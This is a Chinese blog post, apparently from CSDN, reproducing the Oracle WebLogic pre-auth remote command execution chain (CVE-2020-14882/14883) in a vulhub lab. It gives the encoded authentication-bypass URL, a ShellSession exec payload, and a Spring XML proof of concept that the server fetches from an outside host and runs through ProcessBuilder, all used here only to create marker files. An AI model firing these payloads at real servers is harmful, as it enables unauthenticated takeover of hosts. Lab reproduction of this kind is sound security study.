Weblogic Pre-Auth 远程命令执行(CVE-2020-14882、CVE-2020-14883)

已于 2022-07-15 12:19:43 修改
阅读量331 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 网络安全 web安全 安全
于 2022-07-15 12:19:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44842234/article/details/125801687
版权

 

0x00 漏洞原理

CVE-2020-14882 允许远程用户绕过管理员控制台组件中的身份验证,CVE-2020-14883 允许经过身份验证的用户在管理员控制台组件上执行任何命令。使用这两个漏洞链,未经身份验证的远程攻击者可以通过 HTTP 在 Oracle WebLogic 服务器上执行任意命令并完全控制主机
 
 

0x01 影响版本

Weblogic : 10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0、 14.1.1.0.0

 

0x02 环境搭建
cd vulhub/weblogic/CVE-2020-14882/
docker-compose up -d

请添加图片描述
 
 
 

0x03 漏洞复现
环境启动成功后访问 http://your-ip:7001/console查看管理员控制台登录页面

请添加图片描述
 
 

http://your-ip:7001/console/css/%252e%252e%252fconsole.portal #使用此URL绕过Console组件的身份验证

请添加图片描述
 
 
此时访问后台后是一个低权限的用户,无法安装应用,也无法直接执行任意代码此时,结合 CVE-2020-14882漏洞,远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic Server Console 执行任意代码

CVE-2020-14882有两种利用方式,利用方式一
com.tangosol.coherence.mvel2.sh.ShellSession,
利用方式二 com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext

注:第一种利用方式适合在weblogic 12.2.1 及以上版本中使用,因为 10.3.6 没有 class 'com.tangosol.coherence.mvel2.sh.ShellSession' ,第二种方式使用于所有版本

 
 
 

第一种利用方式:

访问:http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success1');")

请添加图片描述
 
 

docker-compose exec weblogic bash       #进入容器内/tmp/success1已成功创建

请添加图片描述

 
 

用工具检测一遍,成功检测到CVE-2020-14882漏洞

请添加图片描述
 
 

成功执行命令

请添加图片描述
 
 
第二种利用方式:

利用FileSystemXmlApplicationContext,需要制作一个精心制作的 XML 文件并将其提供到 Weblogic 可以访问的服务器上,例如http://example.com/rce.xml,POC如下

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[touch /tmp/success2]]></value>
          </list>
        </constructor-arg>
    </bean>
</beans>

 
 

python -m SimpleHTTPServer 80      #在另一台服务器上启个临时web服务器

请添加图片描述
 
  
 
然后通过以下 URL,Weblogic 将加载此 XML 并执行其中的命令

http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://example.com/rce.xml")

请添加图片描述

 
  
 

成功访问到rce.xml,并执行了rce.xml文件内的恶意代码,创建success2

请添加图片描述
请添加图片描述

 
  
 
 
参考链接
https://vulhub.org/#/environments/weblogic/CVE-2020-14882/
https://blog.csdn.net/weixin_43571641/article/details/110508007

TheK403
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【漏洞复现】WebLogic Server 远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389)
做自己喜欢的事,并将其发挥到极致!
03-20 731
WebLogic Server 存在远程代码执行漏洞,由于WebLogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server 可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据信息泄露。
Weblogic 管理控制台未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)
最新发布
weixin_45653478的博客
05-14 916
Weblogic Pre-Auth Remote Command Execution 漏洞(CVE-2020-14882, CVE-2020-14883)是针对 Oracle WebLogic Server 的两个安全漏洞。CVE-2020-14882 允许远程用户绕过管理员控制台组件中的身份验证,而 CVE-2020-14883 则允许经过身份验证的用户在管理员控制台组件上执行任意命令
WebLogic未授权命令执行漏洞(CVE-2020-14882-14883)
m0_48520508的博客
11-10 8257
0x00简介 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 Weblogic对比Tomcat 0x01漏洞概述 CVE-2020-14882: 代码执行漏洞 远程攻击者可以构造特殊的HTTP请求,在未经身份
Palo Alto GlobalProtect上的PreAuth RCE
渗透测试研究中心
07-18 279
0x00 前言 SSL VPN虽然可以保护企业资产免受互联网被攻击的风险影响,但如果SSL VPN本身容易受到攻击呢?它们暴露在互联网上,可以可靠并安全地连接到内网中。一旦SSL VPN服务器遭到入侵,攻击者就可以渗透到内网,甚至接管所有连接到ssl-vpn服务器的用户!由于其重要性,在过去几个月中,我们开始对安全领先的SSL VPN产品进行安全研究。 我们计划用3篇文章上发布我们的结果。我们把...
Weblogic未授权访问漏洞-CVE-2020-14882&&CVE-2020-14883
weixin_51151498的博客
12-05 1585
weblogic漏洞复现
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-2883:Weblogic coherence.jar RCE
04-13
CVE-2020-2883 先克隆框架 git clone https://github.com/Y4er/CVE-2020-2555 然后将 CVE_2020_2883.java 放到 src/com/supeream/CVE_2020_2883.java 目录下 导入idea运行 CVE_2020_2883.java RCE! 截图
cve_2020_14883.zip
05-28
标题 "cve_2020_14883.zip" 暗示了这是一个与CVE-2020-14883安全漏洞相关的压缩文件包,该漏洞可能涉及Oracle WebLogic Server。Oracle WebLogic Server是一款广泛应用的企业级Java EE应用服务器,为企业提供集成的...
weblogic10.36 CVE-2018-2893补丁文件
08-02
weblogic10.36 CVE-2018-2893补丁文件 最新补丁文件,修复 WebLogicCVE-2018-2893)安全漏洞预警,oracle官方发布了2018年4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic反序列化漏洞...
简记 | CVE-2020-14882,CVE-2020-14883
bin789456的博客
10-25 385
原理简析:出现这个漏洞的关键就在于,如果请求的路径在 ​​matchMap​​​ 列表里,那么 ​​​​​ 值就为 ​​true​​ ,这些是属于静态资源,没有做资源的限制和身份校验。近似于全局权限控制变量。在​​​ 方法首先判断 ​​,我们就可以通过修改请求 ​​​​​ 访问静态资源使值为​​true​​。后面要做的就是重定向,后面payload做了一个重定向最后请求portal文件,构建控件树最后目录穿越,获取到的文件也就是 ​​webapp​​​ 下的 ​​。
vulhub中Weblogic 管理控制台未授权远程命令执行漏洞复现(CVE-2020-14882,CVE-2020-14883)
yougexiaojiuguan的博客
03-10 634
漏洞复现过程的记录
Weblogic Unauthentication Remote Command Execution (CVE-2020-14882, CVE-2020-14883)
黑白的博客
12-06 452
声明 好好学习,天天向上 漏洞描述 Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882和CVE-2020-14883。 CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的
Weblogic 未认证远程命令执行CVE-2020-14882、CVE-2020-14883)
灰太的表格的博客
11-04 3595
Weblogic 未认证远程命令执行CVE-2020-14882、CVE-2020-14883) 漏洞环境: vulhub 漏洞复现: CVE-2020-14882 允许远程用户绕过管理员控制台组件中的身份验证。CVE-2020-14883 允许经过身份验证的用户在管理员控制台组件上执行任何命令。使用这两个漏洞的连锁,未经身份验证的远程攻击者可以通过 HTTP 在 Oracle WebLogic 服务器上执行任意命令并完全控制主机。 1.docker 开个环境: ...
weblogic 远程代码执行 (CVE-2019-2725)
YouthBelief的博客
11-03 2093
@[TOC](weblogic 远程代码执行 (CVE-2019-2725)) weblogic 远程代码执行 (CVE-2019-2725) 这个漏洞依旧是根据weblogic的xmldecoder反序列化漏洞,通过针对Oracle官网历年来的补丁构造payload来绕过。 0x01 漏洞描述 Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管
WebLogic远程命令执行
dda6607的博客
01-27 1037
靶机说明 目标ip:172.16.53.28(window 2003) 本靶机所针对的序列化漏洞系列以及常见安全问题如下: 弱口令登陆控制台部署war包webshell CVE-2018-2893 CVE-2018-2628 CVE-2017-10271 CVE-2017-3248 CVE-2016-3510 CVE-2015-4852 weblogic ss...
weblogic wls-wsat组件远程命令执行CVE-2017-3506)
YouthBelief的博客
11-01 7738
weblogic wls-wsat组件远程命令执行CVE-2017-3506) 前言 与weblogic 反序列化(CVE-2017-10271)类似 一般情况下weblogic会开放7001以及7002端口 0x01 漏洞描述 wls-wsat组件远程命令执行 如果访问/wls-wsat/CoordinatorPortType11目录,存在下图则说明或许存在漏洞 /wls-wsat/CoordinatorPortType11 0x02 影响范围 OracleWebLogic Server10.3.6.
Weblogic RCE漏洞CVE-2020-14882&14883:复现与影响版本解析
近期,两个关键性漏洞 CVE-2020-14882 和 CVE-2020-14883 被发现,这些漏洞的存在使得未经授权的远程攻击者能够通过精心构造的GET请求,在受影响的Weblogic Server上执行任意代码。这两个漏洞影响了多个版本,包括...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值